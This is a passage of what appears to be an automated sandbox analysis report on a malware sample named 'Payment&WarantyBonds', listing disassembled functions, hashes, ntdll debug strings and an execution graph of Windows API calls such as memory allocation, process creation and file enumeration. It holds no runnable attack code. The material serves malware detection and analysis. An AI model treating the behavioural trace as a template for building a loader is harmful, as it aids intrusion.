                                                                                                                                                                                • Instruction Fuzzy Hash: F6D0C935212E80CFD61BCB0CC5A4F1633A8BB88B44F850591F401CBB32D67CDD40CA00
                                                                                                                                                                                Function 014A930B Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                                                                                • Instruction ID: 34c5f946ac10d20fb311e8363482f6fd36df0a432225c5fbf735ad85ce60d8cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                                                                                • Instruction Fuzzy Hash: 18D01739941AC48FE72BCB08C165B917BF4F719B44FC61099E0424BBA2C27C9984CB00
                                                                                                                                                                                Function 01440310 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                • Instruction ID: 2c3ae73593acde9cc35406a8f7a04fa278982bd79f2a1cedea0875d21b264bc9
                                                                                                                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                • Instruction Fuzzy Hash: 73D01236100248EFCB01DF41C890D9A7B2AFBD8710F108019FD19076108A31ED62DA50
                                                                                                                                                                                Function 0144340D Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                                                                                                                • Instruction ID: 8d9b4745c2ac6a8dbc547b5b1cd87a8b8a239159df4dd5193a74c591b1cad74d
                                                                                                                                                                                • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                                                                                                                • Instruction Fuzzy Hash: 77C08C791415916BFB2B9F05C900B2A7A50BB14AA6F8401ADAB40295B2C37C98028218
                                                                                                                                                                                Function 01462890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                • Opcode ID: 20cdd772f2ec0a9f3e1b961e164b267f392f339a2cf229f44ee0665facadf5b8
                                                                                                                                                                                • Instruction ID: b8006cddcf04347b0d2a17a02805051ad7e2b369b2637d3c591a99c7fb3d4af1
                                                                                                                                                                                • Opcode Fuzzy Hash: 20cdd772f2ec0a9f3e1b961e164b267f392f339a2cf229f44ee0665facadf5b8
                                                                                                                                                                                • Instruction Fuzzy Hash: 0751F3B2B00116BFCB11DF9D8880D7EFBB8BB59244714C22BE469D3651D374DE048BA1
                                                                                                                                                                                Function 01457630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01494787
                                                                                                                                                                                • Execute=1, xrefs: 01494713
                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014946FC
                                                                                                                                                                                • ExecuteOptions, xrefs: 014946A0
                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01494655
                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01494742
                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01494725
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                • Opcode ID: 458e1fbe02e6346d4d1377ea602778df2d4be8816e3068266eda712b9adf81dc
                                                                                                                                                                                • Instruction ID: ad862b95476a79597cd59283b52feabcdb34cad104b4705bda3ac57ed64bc6cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 458e1fbe02e6346d4d1377ea602778df2d4be8816e3068266eda712b9adf81dc
                                                                                                                                                                                • Instruction Fuzzy Hash: E95160316002097ADF119B95EC85FAE7BACAF24315F5400BFD909A72B1D770DE468F61
                                                                                                                                                                                Function 0146B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                • Instruction ID: 4b2cc6140c5775eef3be87593ccc589b279aba2cebb399959635c9f03f7b5fb4
                                                                                                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B81C070F0524A8EEF258E6CC8517FEBBA9EF55328F18411BD955E73A1C73888418B63
                                                                                                                                                                                Function 0145BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 01497BAC
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 01497B8E
                                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01497B7F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 0-871070163
                                                                                                                                                                                • Opcode ID: 5121ad276460454366262617096d81c69e000ebdd96ef3c928c5204a1c24d548
                                                                                                                                                                                • Instruction ID: edb61785349b45b18308091a3b433f6f66dee57a9200fbf13a09f5e64d699d43
                                                                                                                                                                                • Opcode Fuzzy Hash: 5121ad276460454366262617096d81c69e000ebdd96ef3c928c5204a1c24d548
                                                                                                                                                                                • Instruction Fuzzy Hash: CB41E4327007029FDB21CE29C850B6BB7E6EF98725F100A1EEA56D77A1D771E405CB91
                                                                                                                                                                                Function 0145B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0149728C
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01497294
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 014972C1
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 014972A3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                                                                • Opcode ID: 84e5fce5f572011186dcd55e33d26953b5b1729a96b230fb6e831cad8339abf3
                                                                                                                                                                                • Instruction ID: 94107e2cb21baea99dc55c79cdd568d767a056325145833b163275f22a372813
                                                                                                                                                                                • Opcode Fuzzy Hash: 84e5fce5f572011186dcd55e33d26953b5b1729a96b230fb6e831cad8339abf3
                                                                                                                                                                                • Instruction Fuzzy Hash: FF411431610206ABCB21CF25CC41B6ABBA5FF65715F10062EFD559B361DB31E8068BD1
                                                                                                                                                                                Function 01467D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-
                                                                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                • Instruction ID: 37bd394eea8d88816a25c54c08051276187826e2c53e13ea3d3ec9271bb9d17d
                                                                                                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                • Instruction Fuzzy Hash: 6791D370E002069BEB28CF6DC890ABFBBA9EF5472EF14451BE955E73E0D73489418712
                                                                                                                                                                                Function 01429126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                • Opcode ID: 9bb98da2bc9bc25e18f3757afe47c089ece8a59f8cc3465ec7f78b9887038825
                                                                                                                                                                                • Instruction ID: 2e8e88c5259bba616b4415033769b9e5ce8397c1ecab7ef3ef95763b0505ed94
                                                                                                                                                                                • Opcode Fuzzy Hash: 9bb98da2bc9bc25e18f3757afe47c089ece8a59f8cc3465ec7f78b9887038825
                                                                                                                                                                                • Instruction Fuzzy Hash: E0812871D002799BDB319B54CC44BEEBAB8AF48714F0441EBEA19B7250D7709E85CFA0

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:2.6%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                                                                                Signature Coverage:2.3%
                                                                                                                                                                                Total number of Nodes:440
                                                                                                                                                                                Total number of Limit Nodes:74
                                                                                                                                                                                execution_graph 95571 567252 95572 567222 95571->95572 95574 567230 95572->95574 95575 56b1a0 95572->95575 95576 56b1c6 95575->95576 95577 56b3ee 95576->95577 95602 5796e0 95576->95602 95577->95574 95579 56b23c 95579->95577 95605 57c540 95579->95605 95581 56b258 95581->95577 95582 56b32b 95581->95582 95611 578930 95581->95611 95584 565a80 LdrInitializeThunk 95582->95584 95586 56b346 95582->95586 95584->95586 95591 56b3d6 95586->95591 95622 5784a0 95586->95622 95587 56b313 95618 568020 95587->95618 95588 56b2f1 95637 5746f0 LdrInitializeThunk 95588->95637 95589 56b2c3 95589->95577 95589->95587 95589->95588 95615 565a80 95589->95615 95592 568020 LdrInitializeThunk 95591->95592 95597 56b3e4 95592->95597 95597->95574 95598 56b3ad 95627 578550 95598->95627 95600 56b3c7 95632 5786b0 95600->95632 95603 5796fd 95602->95603 95604 57970e CreateProcessInternalW 95603->95604 95604->95579 95606 57c4b0 95605->95606 95607 57c50d 95606->95607 95638 57b450 95606->95638 95607->95581 95609 57c4ea 95641 57b370 95609->95641 95612 57894d 95611->95612 95650 47a2c0a 95612->95650 95613 56b2ba 95613->95582 95613->95589 95653 578b00 95615->95653 95617 565abe 95617->95588 95619 568033 95618->95619 95659 578830 95619->95659 95621 56805e 95621->95574 95623 578517 95622->95623 95625 5784c5 95622->95625 95665 47a39b0 LdrInitializeThunk 95623->95665 95624 57853c 95624->95598 95625->95598 95628 5785c7 95627->95628 95630 578575 95627->95630 95666 47a4340 LdrInitializeThunk 95628->95666 95629 5785ec 95629->95600 95630->95600 95633 578727 95632->95633 95635 5786d5 95632->95635 95667 47a2fb0 LdrInitializeThunk 95633->95667 95634 57874c 95634->95591 95635->95591 95637->95587 95644 579600 95638->95644 95640 57b46b 95640->95609 95647 579650 95641->95647 95643 57b389 95643->95607 95645 57961d 95644->95645 95646 57962e RtlAllocateHeap 95645->95646 95646->95640 95648 57966a 95647->95648 95649 57967b RtlFreeHeap 95648->95649 95649->95643 95651 47a2c1f LdrInitializeThunk 95650->95651 95652 47a2c11 95650->95652 95651->95613 95652->95613 95654 578bae 95653->95654 95655 578b2c 95653->95655 95658 47a2d10 LdrInitializeThunk 95654->95658 95655->95617 95656 578bf3 95656->95617 95658->95656 95660 5788ab 95659->95660 95661 578858 95659->95661 95664 47a2dd0 LdrInitializeThunk 95660->95664 95661->95621 95662 5788d0 95662->95621 95664->95662 95665->95624 95666->95629 95667->95634 95668 55b510 95671 57b2e0 95668->95671 95670 55cb81 95674 579440 95671->95674 95673 57b311 95673->95670 95675 5794d2 95674->95675 95677 579468 95674->95677 95676 5794e8 NtAllocateVirtualMemory 95675->95676 95676->95673 95677->95673 95678 56f750 95679 56f7b4 95678->95679 95707 566210 95679->95707 95681 56f8ee 95682 56f8e7 95682->95681 95714 566320 95682->95714 95684 56f96a 95685 56faa2 95684->95685 95704 56fa93 95684->95704 95718 56f530 95684->95718 95686 5792d0 NtClose 95685->95686 95688 56faac 95686->95688 95689 56f9a6 95689->95685 95690 56f9b1 95689->95690 95691 57b450 RtlAllocateHeap 95690->95691 95692 56f9da 95691->95692 95693 56f9e3 95692->95693 95694 56f9f9 95692->95694 95695 5792d0 NtClose 95693->95695 95727 56f420 CoInitialize 95694->95727 95697 56f9ed 95695->95697 95698 56fa07 95730 578db0 95698->95730 95700 56fa82 95734 5792d0 95700->95734 95702 56fa8c 95703 57b370 RtlFreeHeap 95702->95703 95703->95704 95705 56fa25 95705->95700 95706 578db0 LdrInitializeThunk 95705->95706 95706->95705 95708 566243 95707->95708 95709 566267 95708->95709 95737 578e50 95708->95737 95709->95682 95711 56628a 95711->95709 95712 5792d0 NtClose 95711->95712 95713 56630c 95712->95713 95713->95682 95715 566345 95714->95715 95742 578c50 95715->95742 95719 56f54c 95718->95719 95747 564490 95719->95747 95721 56f573 95721->95689 95722 56f56a 95722->95721 95723 564490 LdrLoadDll 95722->95723 95724 56f63e 95723->95724 95725 564490 LdrLoadDll 95724->95725 95726 56f698 95724->95726 95725->95726 95726->95689 95729 56f485 95727->95729 95728 56f51b CoUninitialize 95728->95698 95729->95728 95731 578dca 95730->95731 95751 47a2ba0 LdrInitializeThunk 95731->95751 95732 578dfa 95732->95705 95735 5792ed 95734->95735 95736 5792fe NtClose 95735->95736 95736->95702 95738 578e6d 95737->95738 95741 47a2ca0 LdrInitializeThunk 95738->95741 95739 578e99 95739->95711 95741->95739 95743 578c6d 95742->95743 95746 47a2c60 LdrInitializeThunk 95743->95746 95744 5663b9 95744->95684 95746->95744 95748 5644b4 95747->95748 95749 5644bb 95748->95749 95750 5644f0 LdrLoadDll 95748->95750 95749->95722 95750->95749 95751->95732 95752 570050 95753 570073 95752->95753 95754 564490 LdrLoadDll 95753->95754 95755 570097 95754->95755 95757 568747 95759 56874a 95757->95759 95758 568701 95759->95758 95761 567000 95759->95761 95762 567016 95761->95762 95764 56704f 95761->95764 95762->95764 95765 566e70 LdrLoadDll 95762->95765 95764->95758 95765->95764 95766 559dc0 95768 559dcf 95766->95768 95767 559e10 95768->95767 95769 559dfd CreateThread 95768->95769 95770 569b40 95771 569b56 95770->95771 95772 569b5b 95770->95772 95773 569b8d 95772->95773 95774 57b370 RtlFreeHeap 95772->95774 95774->95773 95775 56c500 95777 56c529 95775->95777 95776 56c62d 95777->95776 95778 56c5d3 FindFirstFileW 95777->95778 95778->95776 95780 56c5ee 95778->95780 95779 56c614 FindNextFileW 95779->95780 95781 56c626 FindClose 95779->95781 95780->95779 95781->95776 95782 565b00 95783 568020 LdrInitializeThunk 95782->95783 95785 565b30 95782->95785 95783->95785 95786 565b5c 95785->95786 95787 567fa0 95785->95787 95788 567fe4 95787->95788 95793 568005 95788->95793 95794 578600 95788->95794 95790 567ff5 95791 568011 95790->95791 95792 5792d0 NtClose 95790->95792 95791->95785 95792->95793 95793->95785 95795 578677 95794->95795 95797 578625 95794->95797 95799 47a4650 LdrInitializeThunk 95795->95799 95796 57869c 95796->95790 95797->95790 95799->95796 95800 571a40 95804 571a59 95800->95804 95801 571ae6 95802 571aa1 95803 57b370 RtlFreeHeap 95802->95803 95805 571aae 95803->95805 95804->95801 95804->95802 95806 571ae1 95804->95806 95807 57b370 RtlFreeHeap 95806->95807 95807->95801 95820 56ac70 95825 56a980 95820->95825 95822 56ac7d 95839 56a600 95822->95839 95824 56ac99 95826 56a9a5 95825->95826 95850 568290 95826->95850 95829 56aaf0 95829->95822 95831 56ab07 95831->95822 95832 56aafe 95832->95831 95834 56abf5 95832->95834 95869 56a050 95832->95869 95836 56ac5a 95834->95836 95878 56a3c0 95834->95878 95837 57b370 RtlFreeHeap 95836->95837 95838 56ac61 95837->95838 95838->95822 95840 56a616 95839->95840 95847 56a621 95839->95847 95841 57b450 RtlAllocateHeap 95840->95841 95841->95847 95842 56a642 95842->95824 95843 568290 GetFileAttributesW 95843->95847 95844 56a952 95845 56a96b 95844->95845 95846 57b370 RtlFreeHeap 95844->95846 95845->95824 95846->95845 95847->95842 95847->95843 95847->95844 95848 56a050 RtlFreeHeap 95847->95848 95849 56a3c0 RtlFreeHeap 95847->95849 95848->95847 95849->95847 95851 5682b1 95850->95851 95852 5682c3 95851->95852 95853 5682b8 GetFileAttributesW 95851->95853 95852->95829 95854 5732e0 95852->95854 95853->95852 95855 5732ee 95854->95855 95856 5732f5 95854->95856 95855->95832 95857 564490 LdrLoadDll 95856->95857 95858 57332a 95857->95858 95859 573339 95858->95859 95882 572da0 LdrLoadDll 95858->95882 95861 57b450 RtlAllocateHeap 95859->95861 95865 5734e4 95859->95865 95862 573352 95861->95862 95863 5734da 95862->95863 95862->95865 95867 57336e 95862->95867 95864 57b370 RtlFreeHeap 95863->95864 95863->95865 95864->95865 95865->95832 95866 57b370 RtlFreeHeap 95868 5734ce 95866->95868 95867->95865 95867->95866 95868->95832 95870 56a076 95869->95870 95883 56da60 95870->95883 95872 56a0e8 95874 56a270 95872->95874 95875 56a106 95872->95875 95873 56a255 95873->95832 95874->95873 95876 569f10 RtlFreeHeap 95874->95876 95875->95873 95888 569f10 95875->95888 95876->95874 95879 56a3e6 95878->95879 95880 56da60 RtlFreeHeap 95879->95880 95881 56a46d 95880->95881 95881->95834 95882->95859 95885 56da84 95883->95885 95884 56da91 95884->95872 95885->95884 95886 57b370 RtlFreeHeap 95885->95886 95887 56dad4 95886->95887 95887->95872 95889 569f2d 95888->95889 95892 56daf0 95889->95892 95891 56a033 95891->95875 95894 56db14 95892->95894 95893 56dbbe 95893->95891 95894->95893 95895 57b370 RtlFreeHeap 95894->95895 95895->95893 95896 57c470 95897 57b370 RtlFreeHeap 95896->95897 95898 57c485 95897->95898 95899 579230 95900 5792a4 95899->95900 95902 579258 95899->95902 95901 5792ba NtDeleteFile 95900->95901 95903 47a2ad0 LdrInitializeThunk 95904 5711fc 95905 571201 95904->95905 95907 5711ee 95904->95907 95906 57121d 95907->95906 95919 579140 95907->95919 95909 571252 95910 571285 95909->95910 95911 571270 95909->95911 95913 5792d0 NtClose 95910->95913 95912 5792d0 NtClose 95911->95912 95914 571279 95912->95914 95916 57128e 95913->95916 95915 5712c5 95916->95915 95917 57b370 RtlFreeHeap 95916->95917 95918 5712b9 95917->95918 95920 5791e1 95919->95920 95922 579165 95919->95922 95921 5791f7 NtReadFile 95920->95921 95921->95909 95922->95909 95923 5719bc 95924 5719c2 95923->95924 95925 5792d0 NtClose 95924->95925 95927 5719c7 95924->95927 95926 5719ec 95925->95926 95928 559e20 95931 559fe4 95928->95931 95930 55a26c 95930->95930 95931->95930 95932 57afd0 95931->95932 95933 57aff6 95932->95933 95938 5540d0 95933->95938 95935 57b002 95936 57b03b 95935->95936 95941 575570 95935->95941 95936->95930 95945 5631b0 95938->95945 95940 5540dd 95940->95935 95942 5755d1 95941->95942 95944 5755de 95942->95944 95956 561980 95942->95956 95944->95936 95946 5631cd 95945->95946 95948 5631e6 95946->95948 95949 579d30 95946->95949 95948->95940 95951 579d4a 95949->95951 95950 579d79 95950->95948 95951->95950 95952 578930 LdrInitializeThunk 95951->95952 95953 579dd6 95952->95953 95954 57b370 RtlFreeHeap 95953->95954 95955 579def 95954->95955 95955->95948 95957 5619b8 95956->95957 95972 567db0 95957->95972 95959 5619c0 95960 57b450 RtlAllocateHeap 95959->95960 95970 561c8d 95959->95970 95961 5619d6 95960->95961 95962 57b450 RtlAllocateHeap 95961->95962 95963 5619e7 95962->95963 95964 57b450 RtlAllocateHeap 95963->95964 95965 5619f8 95964->95965 95971 561a8f 95965->95971 95987 566970 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 95965->95987 95967 564490 LdrLoadDll 95968 561c42 95967->95968 95983 577eb0 95968->95983 95970->95944 95971->95967 95973 567ddc 95972->95973 95988 567ca0 95973->95988 95976 567e21 95979 567e3d 95976->95979 95981 5792d0 NtClose 95976->95981 95977 567e09 95978 567e14 95977->95978 95980 5792d0 NtClose 95977->95980 95978->95959 95979->95959 95980->95978 95982 567e33 95981->95982 95982->95959 95984 577f11 95983->95984 95986 577f1e 95984->95986 95999 561ca0 95984->95999 95986->95970 95987->95971 95989 567d96 95988->95989 95990 567cba 95988->95990 95989->95976 95989->95977 95994 5789d0 95990->95994 95993 5792d0 NtClose 95993->95989 95995 5789ea 95994->95995 95998 47a35c0 LdrInitializeThunk 95995->95998 95996 567d8a 95996->95993 95998->95996 96002 561cc0 95999->96002 96015 568080 95999->96015 96001 56220f 96001->95986 96002->96001 96019 571070 96002->96019 96005 561ed1 96007 57c540 2 API calls 96005->96007 96006 561d1e 96006->96001 96022 57c410 96006->96022 96009 561ee6 96007->96009 96008 568020 LdrInitializeThunk 96011 561f36 96008->96011 96009->96011 96027 5607d0 96009->96027 96011->96001 96011->96008 96012 5607d0 LdrInitializeThunk 96011->96012 96012->96011 96013 56208a 96013->96011 96014 568020 LdrInitializeThunk 96013->96014 96014->96013 96016 56808d 96015->96016 96017 5680b5 96016->96017 96018 5680ae SetErrorMode 96016->96018 96017->96002 96018->96017 96020 57b2e0 NtAllocateVirtualMemory 96019->96020 96021 571091 96020->96021 96021->96006 96023 57c426 96022->96023 96024 57c420 96022->96024 96025 57b450 RtlAllocateHeap 96023->96025 96024->96005 96026 57c44c 96025->96026 96026->96005 96030 579560 96027->96030 96031 57957a 96030->96031 96034 47a2c70 LdrInitializeThunk 96031->96034 96032 5607f2 96032->96013 96034->96032 96035 5630a3 96036 567ca0 2 API calls 96035->96036 96038 5630b3 96036->96038 96037 5630cf 96038->96037 96039 5792d0 NtClose 96038->96039 96039->96037 96040 562220 96041 578930 LdrInitializeThunk 96040->96041 96042 562256 96041->96042 96045 579370 96042->96045 96044 56226b 96046 5793fc 96045->96046 96047 579398 96045->96047 96050 47a2e80 LdrInitializeThunk 96046->96050 96047->96044 96048 57942d 96048->96044 96050->96048 96051 566ce0 96052 566d0a 96051->96052 96055 567e50 96052->96055 96054 566d34 96056 567e6d 96055->96056 96062 578a20 96056->96062 96058 567ebd 96059 567ec4 96058->96059 96060 578b00 LdrInitializeThunk 96058->96060 96059->96054 96061 567eed 96060->96061 96061->96054 96063 578ab5 96062->96063 96064 578a45 96062->96064 96067 47a2f30 LdrInitializeThunk 96063->96067 96064->96058 96065 578aee 96065->96058 96067->96065 96073 5788e0 96074 5788fd 96073->96074 96077 47a2df0 LdrInitializeThunk 96074->96077 96075 578925 96077->96075 96078 5716a0 96079 5716bc 96078->96079 96080 5716e4 96079->96080 96081 5716f8 96079->96081 96083 5792d0 NtClose 96080->96083 96082 5792d0 NtClose 96081->96082 96084 571701 96082->96084 96085 5716ed 96083->96085 96088 57b490 RtlAllocateHeap 96084->96088 96087 57170c 96088->96087 96089 578760 96090 5787ec 96089->96090 96092 578788 96089->96092 96094 47a2ee0 LdrInitializeThunk 96090->96094 96091 57881d 96094->96091 96095 578fe0 96096 579091 96095->96096 96098 579009 96095->96098 96097 5790a7 NtCreateFile 96096->96097 96099 575fe0 96100 57603a 96099->96100 96102 576047 96100->96102 96103 573a00 96100->96103 96104 57b2e0 NtAllocateVirtualMemory 96103->96104 96105 573a41 96104->96105 96106 564490 LdrLoadDll 96105->96106 96108 573b3e 96105->96108 96109 573a7e 96106->96109 96107 573ac0 Sleep 96107->96109 96108->96102 96109->96107 96109->96108 96110 5626ec 96111 566210 2 API calls 96110->96111 96112 562723 96111->96112 96113 560dab 96114 560db3 PostThreadMessageW 96113->96114 96115 560dbf 96113->96115 96114->96115

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 00559E20 Relevance: 12.8, Strings: 10, Instructions: 295COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
